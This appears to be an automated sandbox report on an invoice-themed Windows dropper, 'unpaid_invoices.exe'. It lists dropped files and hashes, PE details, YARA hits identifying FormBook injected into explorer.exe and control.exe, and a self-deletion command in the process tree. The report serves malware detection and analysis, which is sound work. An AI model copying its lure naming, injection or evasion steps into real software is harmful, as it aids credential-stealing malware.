            Report type:full
            Sample file name:unpaid_invoices.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@10/4@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 70.2% (good quality ratio 65.5%)
            • Quality average: 73.3%
            • Quality standard deviation: 30.8%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 92
            • Number of non-executed functions: 130
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Adjust boot time
            • Enable AMSI

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            11:32:38API Interceptor270x Sleep call for process: explorer.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\bkrxawb6q4pusbov

            Download File
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):175615
            Entropy (8bit):7.989556868411482
            Encrypted:false
            SSDEEP:3072:fpfeyeT9cCEBJbcxy5/96Epl522sTJ21MmJHNcFRar83oCMmuiRV:BfeJT9cC8Ay5/96u522CJ21x/7SMA
            MD5:6EAEEDA92193DFCFE0793EBB42234083
            SHA1:B5F2F6F5DD57C06CAB8AC584FBA3EB1C074BA8B0
            SHA-256:AA6EB5A7ED6934D8A72CE1574976416EB0AE4F9D2D6E4E8D30CA08552E240D89
            SHA-512:FDF3F9F395848419CB8769475996DD496E0192B646238BC8D1A80A117ADB57E160460B89DA914C9A060E8695356DA8B960FEDAC15E6D2CBD55321679E1861481
            Malicious:false
            Reputation:low
            Preview:0 .A....g....!s..Q.s.uv.;.....QeSz...n{a/.VG....BR..!@$..o`...._u....X_.z*MF7.B....8...|..bz.._...ZL..............;|..Q>.oP.k...a4h.V)...xM_.....k.m<..g,B>...#=".D.....5...<..M......q......_....l.1.a'.0.TQ...U..dcPg.......s-...`.^...,FEvn.v..5.......g..0..;kr.T.'...8.=.....Qe.z...n{a/..G....BR..!@$.o`.n}....o.MV...QM,cU.9I.<.o-Q.DA... G.Y...Hf.Y..;`fDuw.1..;|..Q>.....a"..I........n..p..^...1...".X.vh...;......<.Bz.............._..Y.9.+.'.Z.PQ...U...~g....J..s-.....^...,.EUn.v..g.>.....gh.0.5;kr.T.....8...}..QeSz...n{a/.VG....BR..!@$.o`.n}....o.MV...QM,cU.9I.<.o-Q.DA... G.Y...Hf.Y..;`fDuw.1..;|..Q>.....a"..I........n..p..^...1...".X.vh...;..5...<..s.............._..Y.9.+.'.Z.TQ...U...~g....J..s-.....^...,.EUn.v..g.>.....gh.0.5;kr.T.....8...}..QeSz...n{a/.VG....BR..!@$.o`.n}....o.MV...QM,cU.9I.<.o-Q.DA... G.Y...Hf.Y..;`fDuw.1..;|..Q>.....a"..I........n..p..^...1...".X.vh...;..5...<..s.............._..Y.9.+.'.Z.TQ...U...~g...

            C:\Users\user\AppData\Local\Temp\neslq

            Download File
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):5258
            Entropy (8bit):6.125929290266708
            Encrypted:false
            SSDEEP:96:H9FmMmXqfFRM47D8A/g6poDDRFaqyhkjhtnNb79BNophoEHEdl9:HnmMmqfFi47V/g6oDDP7rNYAl9
            MD5:8668A0506B4C9208D6EBFF46EE5D6D1F
            SHA1:07B662FBBF9D91ED7450E7F11F53DC6F007A24C6
            SHA-256:81C2E10EC9F98F9B5613C1D82A8BBA6FDFCDAE10A1C168B953A5EFF0673BF2A1
            SHA-512:059389C79C4CC6012B16614837E0987C142679C130E6C9F28C11F24021E1BA9F945E3087E1628F60D1BBAE3B9D006B34A7DAC0525EF23595A9934498D681A7DB
            Malicious:false
            Reputation:low
            Preview:.lhpp...........pa.0.a]..a.0.a]...xp).tHppp.|pq.dq.`.x..uppp....q.dq.`.x...ppp. ..q.dq.`.x../ppp.(.$q.dq.`.x..4ppp.0.,..`l...h..0mm.d......`..l.........t.l?...`.y...m.t.l..t...|......pppp.lLk%E.tq...q. .q.(..q.0..q...q....z.`...dy...|P.....q.....hak..m.t.pppp).LlMppp.lLc%.|.........dp.....a.0.a].x.h.p..d.P.h.p.`.\?.?l.x.t.h.p..h...x.t..dp.Zv*...npp..npp.\p..q....npp..npp.hp.c.....npp..npp.hp.....Ha.0.a]..).x`ppp...t..xp.Z.t*pp.t..t.x..x....kpp.0...h.h...p.c..c....h.?.p.c..c..n.h..0p.k....q...%.pp...sqq.|.a...q.h..qqq.|..|p.j..p.i)...ppp....lp......a.0.a]..).xHppp.0.t..xp.Z.t*pp.t..t.x..x....lpp.0a..ppp.h.h...p.c0.c,.d.h.?.p.c0.c,.`.h./..c0.c,.\...h...m.[0.[,...h.?.n.c0.c,.k.h..0p.k0..Zv*...ppp...tqq.|..Xp.h...X...Yq.Xq.\q.`q.dq.h...qq.|..|p.j..p.i)...ppp....\p.....T).x`ppp...t..xp.Z.t*pp.t..t.x..x....mpp.0...h.h...p.c..c..d.h.?.p.c..c..n.h..0p.k...c....Kppp..Dtqq.|.Bq.dq.h.9sq

            C:\Users\user\AppData\Local\Temp\nss7D29.tmp

            Download File
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):274229
            Entropy (8bit):7.541319632368503
            Encrypted:false
            SSDEEP:6144:bfeJT9cC8Ay5/96u522CJ21x/7SMYgIVK:bfcv8Ay5/15LCJ21FzZIQ
            MD5:46CFE846A786EBB38056666F469AA5E5
            SHA1:53AB659100C687E483274CE564475D4E9DF31456
            SHA-256:95E7E8F3720E21A18CF700156601444373005ED8FA1F283CB949FC6FAFA842FB
            SHA-512:6B41F8FB00D09A2F2365BC33067F59027122D08F880C11070874402AA0C97E5D844054887F4E76ADF5EE7C8D2CEACC48F60D14F7150D3D29670A0F445403922C
            Malicious:false
            Reputation:low
            Preview:.2......,...................`...t$.......1.......2..........................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\ronkhfyq.exe

            Download File
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):80384
            Entropy (8bit):6.295520176749251
            Encrypted:false
            SSDEEP:1536:FnUDaC+416cLkMoxA705mPtcX/4pi2sWjcdowE:FGaGIcQn/ui5owE
            MD5:66039B0CB9E9C76FD4CFEA6E9D2B130C
            SHA1:ABEDE731EEA86A7FB5D05A9533B4F3F42EAC3189
            SHA-256:D46D7D1FC237E3BF7672757A5872A663B7B9227F9A90A76EE3D45457E7C39E0B
            SHA-512:BC9A1282FD8A16D573C3A97CC2BADADC72594EA5400A042D553FE0D7E8E9D53085BF1AE0BB4BF2CD49C0C56DF8BAA82619FA028135BE0B384F13715838E53A2B
            Malicious:true
            Antivirus:
            • Antivirus: Virustotal, Detection: 35%, Browse
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...F_.b............................G.............@.......................................@..................................$.......p..................................T...............................@............................................text...e........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):6.919498098221858
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:unpaid_invoices.exe
            File size:385563
            MD5:fa28e3d61ae49fda627abfc78ca84dea
            SHA1:7ecf93e5d4a2873a10510d007b33b4c3460b29d5
            SHA256:a7162eb3744c8a0629f9c3967700bf4e015e807340c4e1be3327011a637108c4
            SHA512:0f747377e6b5c776d69b160cc75d02450f7b514c8136bfd3695d8a6a0198340f767c857847e5aa1dbac7a3769351d2eb4fff18d5278a229dc428b32640812489
            SSDEEP:6144:OOtIeWOzdoSik7zuDnTpxRy04Q7zoMmy7WPFmMQZfQcTWlvr0YHSN+w4FIG4qHay:OOaOzdoSP7yDlxBv73jSPgn61r0YHBFz
            TLSH:FB84F151F3049059EDAB63B3443FAE324A476E3E9AB4A21B034D75717FF3242552BE06
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

            File Icon

            Icon Hash:00000023490d3000

            Static PE Info

            General

            Entrypoint:0x403646
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:61259b55b8912888e90f516ca08dc514

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            sub esp, 000003F4h
            push ebx
            push esi
            push edi
            push 00000020h
            pop edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [ebp-14h], ebx
            mov dword ptr [ebp-04h], 0040A230h
            mov dword ptr [ebp-10h], ebx
            call dword ptr [004080C8h]
            mov esi, dword ptr [004080CCh]
            lea eax, dword ptr [ebp-00000140h]
            push eax
            mov dword ptr [ebp-0000012Ch], ebx
            mov dword ptr [ebp-2Ch], ebx
            mov dword ptr [ebp-28h], ebx
            mov dword ptr [ebp-00000140h], 0000011Ch
            call esi
            test eax, eax
            jne 00007F1738CCC0CAh
            lea eax, dword ptr [ebp-00000140h]
            mov dword ptr [ebp-00000140h], 00000114h
            push eax
            call esi
            mov ax, word ptr [ebp-0000012Ch]
            mov ecx, dword ptr [ebp-00000112h]
            sub ax, 00000053h
            add ecx, FFFFFFD0h
            neg ax
            sbb eax, eax
            mov byte ptr [ebp-26h], 00000004h
            not eax
            and eax, ecx
            mov word ptr [ebp-2Ch], ax
            cmp dword ptr [ebp-0000013Ch], 0Ah
            jnc 00007F1738CCC09Ah
            and word ptr [ebp-00000132h], 0000h
            mov eax, dword ptr [ebp-00000134h]
            movzx ecx, byte ptr [ebp-00000138h]
            mov dword ptr [007A8B58h], eax
            xor eax, eax
            mov ah, byte ptr [ebp-0000013Ch]
            movzx eax, ax
            or eax, ecx
            xor ecx, ecx
            mov ch, byte ptr [ebp-2Ch]
            movzx ecx, cx
            shl eax, 10h
            or eax, ecx

            Rich Headers

            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000x1e758.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x3b90000x1e7580x1e800False0.269339139344data3.47813772523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x3b92800x10828dataEnglishUnited States
            RT_ICON0x3c9aa80x59acPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
            RT_ICON0x3cf4580x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
            RT_ICON0x3d36800x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
            RT_ICON0x3d5c280x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
            RT_ICON0x3d6cd00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
            RT_DIALOG0x3d71380x100dataEnglishUnited States
            RT_DIALOG0x3d72380x11cdataEnglishUnited States
            RT_DIALOG0x3d73580x60dataEnglishUnited States
            RT_GROUP_ICON0x3d73b80x5adataEnglishUnited States
            RT_MANIFEST0x3d74180x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

            Imports

            DLLImport
            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:11:31:17
            Start date:14/05/2022
            Path:C:\Users\user\Desktop\unpaid_invoices.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\unpaid_invoices.exe"
            Imagebase:0x400000
            File size:385563 bytes
            MD5 hash:FA28E3D61AE49FDA627ABFC78CA84DEA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:1
            Start time:11:31:18
            Start date:14/05/2022
            Path:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
            Imagebase:0xe10000
            File size:80384 bytes
            MD5 hash:66039B0CB9E9C76FD4CFEA6E9D2B130C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Antivirus matches:
            • Detection: 35%, Virustotal, Browse
            Reputation:low

            General

            Target ID:2
            Start time:11:31:19
            Start date:14/05/2022
            Path:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
            Imagebase:0xe10000
            File size:80384 bytes
            MD5 hash:66039B0CB9E9C76FD4CFEA6E9D2B130C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            General

            Target ID:5
            Start time:11:31:25
            Start date:14/05/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff6f3b00000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            General

            Target ID:17
            Start time:11:31:50
            Start date:14/05/2022
            Path:C:\Windows\SysWOW64\control.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\control.exe
            Imagebase:0x7ff7338d0000
            File size:114688 bytes
            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:moderate

            General

            Target ID:18
            Start time:11:31:54
            Start date:14/05/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"
            Imagebase:0x1190000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:19
            Start time:11:31:55
            Start date:14/05/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff647620000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:27
            Start time:11:32:37
            Start date:14/05/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff6f3b00000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:16.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:16.3%
              Total number of Nodes:1372
              Total number of Limit Nodes:22
